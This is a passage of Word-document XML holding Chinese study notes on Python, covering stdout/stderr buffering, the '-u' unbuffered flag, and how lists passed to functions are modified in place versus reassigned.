        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python -u xx.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012EAB61" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用网上的一个程序示例来说明，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认需要缓存后再输出到屏幕，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stderr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则直接打印到屏幕</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76715232" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746B3D93" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51262E0E" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sys.stdout.write("stdout1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C1C074" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sys.stderr.write("stderr1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6400F529" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sys.stdout.write("stdout2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CA09A1" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sys.stderr.write("stderr2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E00FE6" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sys.stdout.write()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sys.stderr.write()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>均是向屏幕打印的语句。其实</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句就是调用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sys.stdout.write()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，例如在打印对象调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print obj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，事实上是调用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sys.stdout.write(obj+'\n')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CEBD0D" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54377509" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>预想的结果是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stdout1stderr1stdout2stderr2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E91C7E3" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际的结果为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stderr1stderr2stdout1stdout2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AE45B3" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB4D624" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原因是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存机制，虽然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stderr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认都是指向屏幕的，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stderr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是无缓存的，程序往</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stderr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出一个字符，就会在屏幕上显示一个；而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是有缓存的，只有遇到换行或者积累到一定的大小，才会显示出来。这就是为什么上面的会最先显示两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stderr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的原因！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D88156A" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68AA8AC0" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数的使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199E2B4" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有了上面的铺垫，就可以引出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unbuffered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）参数后会强制其标准输出也同标准错误一样不通过缓存直接打印到屏幕。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379B165E" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B5DB1B" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stdout1stderr1stdout2stderr2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A3752D" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样变成了预期的输出了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D2F512" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F109672" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不难看出在将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行脚本输出到屏幕结果直接重定向到日志文件的情况下，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数，这样将标准输出的结果不经缓存直接输出到日志文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F01744E" w14:textId="7C114637" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DBFA357" w14:textId="7BEA2814" w:rsidR="001E0FE3" w:rsidRDefault="001E0FE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6110818C" w14:textId="5146C27B" w:rsidR="001E0FE3" w:rsidRDefault="001E0FE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229FD4BB" w14:textId="68B0E0EC" w:rsidR="001E0FE3" w:rsidRDefault="001E0FE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BE8B2A" w14:textId="77777777" w:rsidR="001E0FE3" w:rsidRDefault="001E0FE3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="426" w:name="_Toc159779874"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>队列、链表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="426"/>
    </w:p>
    <w:p w14:paraId="64B1B984" w14:textId="6C587CF4" w:rsidR="001E0FE3" w:rsidRDefault="001E0FE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7276C4" w14:textId="7B694B91" w:rsidR="001E0FE3" w:rsidRDefault="001E0FE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E0FE3">
        <w:t>https://www.cnblogs.com/dingdangsunny/p/15210844.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA4CDE" w14:textId="77777777" w:rsidR="001E0FE3" w:rsidRDefault="001E0FE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B624771" w14:textId="1FC38BB0" w:rsidR="00774FB9" w:rsidRDefault="00774FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="427" w:name="_Toc159779875"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>深拷贝浅拷贝</w:t>
      </w:r>
      <w:r w:rsidR="00882537">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及指针传递</w:t>
      </w:r>
      <w:bookmarkEnd w:id="427"/>
    </w:p>
    <w:p w14:paraId="10E87E0D" w14:textId="57F6D353" w:rsidR="00774FB9" w:rsidRDefault="00774FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3315F6C3" w14:textId="513766F6" w:rsidR="00EB3765" w:rsidRDefault="00EB3765" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指针传参</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F91F6" w14:textId="77777777" w:rsidR="00774FB9" w:rsidRDefault="00774FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对函数传参：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA899C6" w14:textId="114631D1" w:rsidR="00774FB9" w:rsidRDefault="00774FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本数据类型的参数：值传递</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F52537" w14:textId="41200D0F" w:rsidR="00774FB9" w:rsidRPr="00774FB9" w:rsidRDefault="00774FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表、元组、字典作为参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00774FB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指针</w:t>
      </w:r>
      <w:r w:rsidRPr="00774FB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>传递</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5119C7E8" w14:textId="6516F5C8" w:rsidR="00774FB9" w:rsidRDefault="00774FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDFE614" w14:textId="4EB5D5F1" w:rsidR="00774FB9" w:rsidRDefault="00C10980" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入指针会导致函数中的形参实际上是更大命名空间中的参数，会改变外面的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DD6DE5" w14:textId="3754DA2E" w:rsidR="00C10980" w:rsidRDefault="00C10980" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D42F6C5" w14:textId="2EEEF2B8" w:rsidR="00F163A9" w:rsidRDefault="00F163A9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在多线程、多任务的编写中，我发现</w:t>
      </w:r>
      <w:r w:rsidR="002A4F6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多任务处理的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>队列、列表等变量的传递，本质上是指针的传递。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6602D981" w14:textId="77777777" w:rsidR="00F163A9" w:rsidRDefault="00F163A9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EFE180D" w14:textId="44609D7C" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何利用浅拷贝特性修改外部的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055269D6" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003A40AD">
        <w:t xml:space="preserve">def apply_pattern_to_list(L, pattern='+-', from_start=True): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646CFD4" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003A40AD">
        <w:t xml:space="preserve"> L = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36905F29" w14:textId="3EAAB74D" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003A40AD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> return {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78164FE6" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D24CA4E" w14:textId="78FE4A64" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，是个浅拷贝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC09CD1" w14:textId="5698201B" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果我直接赋值，他只是内部的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向了一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，并不会改变原有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E948BC6" w14:textId="469473D7" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="003A40AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>要改变原有</w:t>
      </w:r>
      <w:r w:rsidRPr="003A40AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="003A40AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的值，只能修改，而非重新赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB5546" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220396E6" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def apply_pattern_to_list(L, pattern='+-', from_start=True):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC0C640" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清空原列表内容，但保持引用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44827724" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRPr="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003A40AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">L.clear()  # </w:t>
      </w:r>
      <w:r w:rsidRPr="003A40AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这样就会修改原始传入的列表，而不是重新赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C217D83" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加新内容，例如按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式添加</w:t>
      </w:r>
    </w:p>
